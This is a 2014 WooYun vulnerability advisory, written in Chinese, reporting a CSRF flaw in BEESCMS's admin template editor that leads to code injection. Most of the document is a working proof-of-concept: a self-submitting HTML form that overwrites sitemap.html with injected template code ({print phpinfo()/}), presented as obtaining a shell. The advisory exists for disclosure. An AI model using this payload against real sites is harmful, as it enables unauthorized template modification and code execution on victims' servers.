当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-066862

漏洞标题:BEESCMS csrf+getshell

相关厂商:beescms.com

漏洞作者: menmen519

提交时间:2014-07-06 12:41

修复时间:2014-10-01 12:42

公开时间:2014-10-01 12:42

漏洞类型:CSRF

危害等级:高

自评Rank:10

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-07-06: 细节已通知厂商并且等待厂商处理中
2014-07-11: 厂商主动忽略漏洞,细节向第三方安全合作伙伴开放
2014-09-04: 细节向核心白帽子及相关领域专家公开
2014-09-14: 细节向普通白帽子公开
2014-09-24: 细节向实习白帽子公开
2014-10-01: 细节向公众公开

简要描述:

BEESCMS 此间站应用没有对referer字段进行过滤,可导致csrf,并且获取shell

详细说明:

模板生成
--模板页面管理

1.png


点击修改,如图所示:

2.png


然后我们在另一台服务器上面构造好表单 表单内容如下:

<html>
<form class="form" action="http://192.168.10.70/BEES_V3.4_R_20140421/admin/admin_template.php?nav=list_tpl&admin_p_nav=tpl" enctype="multipart/form-data" method="post" name="maininfo">
<div class="order_main">
<table width="100%" cellspacing="0" cellpadding="0">
<thead>
<tr><th style="width:10%; text-align:center">参数说明</th><th class="w2">参数值</th></tr>
</thead>
<tbody>
<tr>
<td style="width:10%; text-align:center">模板地址:</td><td class="w2">template/default/sitemap.html</td>
</tr>
<tr>
<td style="width:10%; text-align:center">修改:</td><td class="w2"><textarea name="template" style="width:100%; height:500px; font-size:12px;">&lt;!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"&gt;
&lt;html xmlns="http://www.w3.org/1999/xhtml"&gt;&lt;head&gt;
&lt;meta http-equiv="Content-Type" content="text/html; charset=UTF-8"&gt;
&lt;meta name="description" content="{print weblangs('sitemap')/}"&gt;
&lt;meta name="keywords" content="{print weblangs('sitemap')/}"&gt;
&lt;title&gt;{print weblangs('sitemap')/}_{print webinfo('web_name')/}&lt;/title&gt;
&lt;link href="{path template/}/images/style.css" rel="stylesheet" type="text/css"&gt;
&lt;script type="text/javascript" src="{path template/}/images/jquery.js"&gt;&lt;/script&gt;
&lt;script type="text/javascript" src="{path template/}/images/nav.js"&gt;&lt;/script&gt;
&lt;/head&gt;
&lt;body&gt;
{include head/}
&lt;div class="div_margin"&gt;&lt;/div&gt;
&lt;div class="contain"&gt;
&lt;div class="sitemap"&gt;
&lt;div class="sitemap_box"&gt;
{loop source=get_sitemap() item=$child}
&lt;h2&gt;&lt;a href="{print $child['url']/}" title="{print $child['name']/}"&gt;{print $child['name']/}&lt;/a&gt;&lt;/h2&gt;
{if $child['child']}
&lt;ul&gt;
{loop source=$child['child'] item=$child2}
&lt;li&gt;&lt;a href="{print $child2['url']/}" title="{print $child2['name']/}"&gt;{print $child2['name']/}&lt;/a&gt;&lt;/li&gt;
{loop source=$child2['child']}
&lt;li&gt;&lt;a href="{print $v['url']/}" title="{print $v['name']/}"&gt;{print $v['name']/}&lt;/a&gt;&lt;/li&gt;
{/loop}
{/loop}
&lt;/ul&gt;
{/if}
&lt;div class="clear"&gt;&lt;/div&gt;
{/loop}
&lt;/div&gt;
&lt;/div&gt;&lt;!--网站地图--&gt;
&lt;/div&gt;
{include foot/}
{print phpinfo()/}
&lt;/body&gt;
&lt;/html&gt;</textarea></td>
</tr>

</tbody>
</table>
</div>
<div class="order_btn">
<input type="hidden" value="save_template" name="action"><input type="hidden" value="template/default/sitemap.html" name="file">
<input type="submit" name="submit" class="go" value="确定">
</div>
</form>
<script>
document.maininfo.submit();
</script>
<html>


3.png


4.png


成功提交了,我们然后去主页看看,站点地图哪里是否已经写入shell:

5.png


漏洞证明:

修复方案:

版权声明:转载请注明来源 menmen519@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2014-10-01 12:42

厂商回复:

最新状态:

暂无